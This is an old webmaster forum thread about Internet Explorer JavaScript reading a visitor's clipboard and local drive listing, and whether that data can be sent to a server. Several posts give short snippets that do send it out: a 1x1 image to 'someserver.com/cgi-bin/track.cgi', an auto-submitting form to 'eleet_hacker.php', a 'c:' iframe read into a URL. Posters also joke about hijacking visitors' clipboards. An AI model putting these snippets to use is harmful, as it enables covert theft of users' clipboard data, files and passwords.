http://www.ntfs.org/tmp/clip.html

microsoft at its best.

merry x-mas
Brian

I dont think it's either scary or surprising...

what's so scary about it?
That's javascript.. javascript works client-side.
It's the same trick as showing your c: drive contents in a frame.
You think they can see it, but you're the only one who really can

its not the same... cause you can store it.

Originally posted by Aheib
what's so scary about it?
That's javascript.. javascript works client-side.
It's the same trick as showing your c: drive contents in a frame.
You think they can see it, but you're the only one who really can

My thoughts exactly

That website has no access to your clipboard. As they said, it's client side.

perhaps you got me wrong.
I didnt mean it could change the clipboard or something but just read, and thats sick enough.
step 2: if the clipboard content is displayed in a textbox, you can read it out using perl/php/c/whatever. now think of paysite passwords, private emails or anything else.
once you get the content you can actually search the clipboard for "password" triggers for example.
or am I wrong on this?

of course its client-side, but that doesnt mean its not a bug, its a god damn exploit and MS still didnt manage to fix it.

doesn't work on my machine..

Originally posted by Brian911
step 2: if the clipboard content is displayed in a textbox, you can read it out using perl/php/c/whatever.
once you get the content you can actually search the clipboard for "password" triggers for example.
or am I wrong on this?
.
You are wrong, it is impossible to read that with perl / php UNLESS you submit that data. Why else do you think you have to hit a 'reply' button here whenever you make a post? Because a server cannot get the info from the client live.

In other words, it is NOT a god damn exploit, so don't worry :)

you dont even have to use a form, just use an image tag like script.cgi?textboxcontent

its not like I'm a html form expert but there is a way, I saw it earlier. activex might work too...

I'm about to give up bro....
Showing your stats with javascript is easy,
because it is client-side.
You must understand that html is a dead language, meaning it will render and then do nothing. After that, only the user can perform further actions.
The only way to get this to work is to find a way to make the form submit itself.
When you're working with activeX apps, you're not using a dead language anymore. But for exploits like those, you should have a firewall that blocks that.

I just found the source to send the content, so dont tell me it doesnt work, it does. and it is one hell of an exploit because it can be used in emails and about everything that supports html+jscript. plus it is a much easier code than the autobookmark one was back then AND works with standard security settings.

you can give up on me now. ;)

Brian, can you hit me up on icq? (128185802)
I'd like to take a look at that code...
If what you're saying is true, I can (and will) contact a guy at microsoft I know in order to bring out a patch to fix this....

Aaaaaaaaaaaaaaaaaaaaahhhhhhhhhhh.................. .............not scary :finger:

this is CRAZY........

big brother is watching....

isn't there some type of basic software package that could clear the contents of your clipboard for you on a predetermined time frame?

http://ip-sorter.com/demos/clip/clip.htm

Put something in your clipboard, and click the above link.

Very basic eg showing how the data could be passed to the server side.

In this case, it redirects you to a php page that echos the query string. It could do this much more elegantly, without you ever knowing about it.

Too bad Richard, but that didn't work.
I had this on my clipboard:
" #!/bin/sh
echo "Content-type: text/plain"
echo
set
"
yet the output was:
Your clipboard was

--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

No data was saved to the server, but it could have been
(tried it with several browsers)
How is this working for others?

btw, richard, I thought that working with meta tags to get client side info was one of the oldest tricks in the book.

When I typed that part "The only way to get this to work is to find a way to make the form submit itself."
is when I thought of this one as well...
not a real danger since it's easy to avoid

It did display the sentence I had in my clipboard! Perhaps this is more vulnerable than I thought

Aheib, try again with that text (i did not escape() the clipboard contents).

location.href just proves it can be done, there are many different ways of doing effectively the same thing

Edit: Too bad Aheib, but it does work

so correct me if im wrong but that seems kind of useless. i mean, you would first have to hack the site that you wanted to collect info from, second insert your php code into their scripts to read the text box (assuming you could even find the section of code that related to the text box you wanted the info from), and third then you have to have that info saved somewhere or emailed somewhere and somebodys probably going to notice that. i know i would.

or i guess you could haxor your own paysite :)

Slothdog, yea, in practice its not going to be all that great an exploit for 'hacking' paysites.

Its more worrying that your clipboard could be spyed on. Perhaps you've got sensitive data on it (like your FTP password or similar) it could be read if you visited a baddy's url.

Or maybe you've just finished writing an important email or document, and you've had data on the clipboard from that...

Aheib, what about IE's iframe?

http://ip-sorter.com/demos/clip/clipIE.htm

I like Brian's image src method personally :)

http://ip-sorter.com/demos/clip/clip.htm

try it again...

After it has shown your clipboard, paste your clipboard into notepad or something :-)

0wn3d!

:D

yup Richard, with the extra escape code it works. Nice job :)
The iframe I was talking about was the <iframe source="c:"></iframe> to show your drive contents

you know what would be funny. switch the clipboard content for some info of your own. like next time somebody went to paste something they got 'hahaha i changed your clipboard' insted :)

Slothdog, I just 0wn0r3d your clipboard :)

click the link again and check your new clipboard after...

look guys I dont want to go in a discussion or anything but EVERYTHING can be read. Also your C-Drive or whatever.

it's rather trivial.

<iframe name="oops" src="c:\"></iframe>
location.href="save_the_shit.php?shit=" + document.all["oops"].innerText;

done.

yep, very close to my approach richard. :)

just found the function to write to clipboard as well, but I dont like it that much lol

1337 h4x0r u r :D

Originally posted by Much0S
look guys I dont want to go in a discussion or anything but EVERYTHING can be read. Also your C-Drive or whatever.

it's rather trivial.

<iframe name="oops" src="c:\"></iframe>
location.href="save_the_shit.php?shit=" + document.all["oops"].innerText;
done.
Not true
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q208427
INFO: Maximum URL Length Is 2,083 Characters in Internet Explorer
Plus, with the limited formatting options url encoding offers, it's simply not really possible....

Originally posted by Aheib

Not true
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q208427
INFO: Maximum URL Length Is 2,083 Characters in Internet Explorer
Plus, with the limited formatting options url encoding offers, it's simply not really possible....
Then just run it through a form uploader thing running in the background or something.
upload.php?file=c:\program files\ftp-program\passwordlist.dat
swap-clipboard ="I just downloaded your password file. thanks"

I mean no offence at all man, but it's really nothing to be afraid of at all..

"THEY" aren't reading your clipboard.

YOU are reading your clipboard.

It's CS, no data is being sent to them... It's a script running on your machine, reading your machine.

Originally posted by Due

Then just run it through a form uploader thing running in the background or something.
upload.php?file=c:\program files\ftp-program\passwordlist.dat
swap-clipboard ="I just downloaded your password file. thanks" You're still gonna need code to have a form submit itself. Using meta tags to refresh with url variables, well, we all do that. But auto-submitting forms?

Originally posted by blind
I mean no offence at all man, but it's really nothing to be afraid of at all..

"THEY" aren't reading your clipboard.

YOU are reading your clipboard.

It's CS, no data is being sent to them... It's a script running on your machine, reading your machine.

Haven't you been reading the thread? The content is in a javascript variable, therefore it can easily be passed to a web server...

Originally posted by blind
I mean no offence at all man, but it's really nothing to be afraid of at all..

"THEY" aren't reading your clipboard.

YOU are reading your clipboard.

It's CS, no data is being sent to them... It's a script running on your machine, reading your machine.
Blind, I just wrote the code myself as well, and asked a friend to log in on a site of mine.
I actually did store it in a database on my server, and guess what? It worked... he was pretty amazed to hear me tell him what was in his memory.... since we're passing the client-side url variables through the server, you can store them easily....

man, this kinda sucks...

Originally posted by Aheib

Blind, I just wrote the code myself as well, and asked a friend to log in on a site of mine.
I actually did store it in a database on my server, and guess what? It worked... he was pretty amazed to hear me tell him what was in his memory.... since we're passing the client-side url variables through the server, you can store them easily....

man, this kinda sucks...

dude, it was a real good idea not to give up on you. you got it :D

Originally posted by Aheib
You're still gonna need code to have a form submit itself. Using meta tags to refresh with url variables, well, we all do that. But auto-submitting forms?

document.write('<img src=\"http://someserver.com/cgi-bin/track.cgi?'+escape(ClipboardContentsVar)+'\" width=1 height=1>')

Originally posted by Aheib
You're still gonna need code to have a form submit itself. Using meta tags to refresh with url variables, well, we all do that. But auto-submitting forms?
Set a javascript timer and set it to submit the form.
you can submit forms with onblur, onfocus so why not on a timer?

Originally posted by Brian911

dude, it was a real good idea not to give up on you. you got it :D Hehe, yes, and I am amazed that they would incorporate something like .clippie
Doesn't work with other browsers tho...

Originally posted by Due

Set a javascript timer and set it to submit the form.
you can submit forms with onblur, onfocus so why not on a timer?
Yup, didn't say it wasn't possible, I just said you needed it :)

I'm gonna shoot my man at microsoft a mail on this one...

Originally posted by Aheib
Hehe, yes, and I am amazed that they would incorporate something like .clippie
Doesn't work with other browsers tho...

Yup, didn't say it wasn't possible, I just said you needed it :)

I'm gonna shoot my man at microsoft a mail on this one...

yea but try to sell the info :)

aheib i mean no disrespect but you hardly know anything of javascript.

you can easily submit automatically. Trust me the information *is* leaked easily.

<FORM NAME=gnarf METHOD=POST action="eleet_hacker.php">
<INPUT TYPE=HIDDEN NAME=data>
</FORM>

<SCRIPT>
document.all["data"].text = document.all["iframe"].innerText;
gnarf.Submit();
</SCRIPT>

DONE. Yes it works.

Holy shit - incredible that IE has such spy function that everyone can exploit..

Unbelieveable... and then they go blocking third party cookies etc with their Privacy protection policy....

crap crap!

Oh and Merry Christmas all of you ;-)

Originally posted by Much0S
aheib i mean no disrespect but you hardly know anything of javascript.
you can easily submit automatically. Trust me the information *is* leaked easily.
No offense taken, and I hate to quote myself, but
Yup, didn't say it wasn't possible, I just said you needed it
In other words, don't judge my knowledge on incorrect interpretations please :)
But you're right, I'm no javascript kiddie. I know just enough to run my sites with it hehe.
C++ and coldfusion is what I do best

So you can change someone's clipboard?

You should put your URL in visitors clipboards when they visit your site :) Nice piece of extra exposure muhaha

Originally posted by Undutchable
So you can change someone's clipboard?

You should put your URL in visitors clipboards when they visit your site :) Nice piece of extra exposure muhaha

ROFL, thats business! I say go for it :rotflmao:
it is so damn easy that every fucking freesite will do it, and I posted it... nooooo ;)

Yep, you can easily change the clipboard's contents :-)

You could easily replace all the letter "a" with letter "e" as well ;-)

BTW: I have XP sp1 installed, and am up-to-date with all the IE patches, and the C:/ iframe does not work, so you cant go phishing for cuteftp password files on my computer....

unless there is another way? :)

Originally posted by richard
Yep, you can easily change the clipboard's contents :-)

You could easily replace all the letter "a" with letter "e" as well ;-)

BTW: I have XP sp1 installed, and am up-to-date with all the IE patches, and the C:/ iframe does not work, so you cant go phishing for cuteftp password files on my computer....

unless there is another way? :)
which part didn't work? Getting the files to show up in the iframe, or to grab the contents?
In case of the first, the correct code is this
<iframe src="file:///C|/" width="500" height="500"></iframe>
I tested it myself with iexplore 6.0x, and it didn't work.
Still works with older versions tho

Originally posted by richard

unless there is another way? :)

If I recall correctly this problem is fixed from IE 5.5 service patch #god knows how much onward...

Yes there are other ways, no i dont know them currently, but with some thinking it should be possible.

Also it's possible to send your history if i'm not mistaking...

guys... with all due respect.. this sample exploit is simply NOTHING compared to what some "big boys" know and use...

sorry, can't say more or i'll have to kill ya' ;)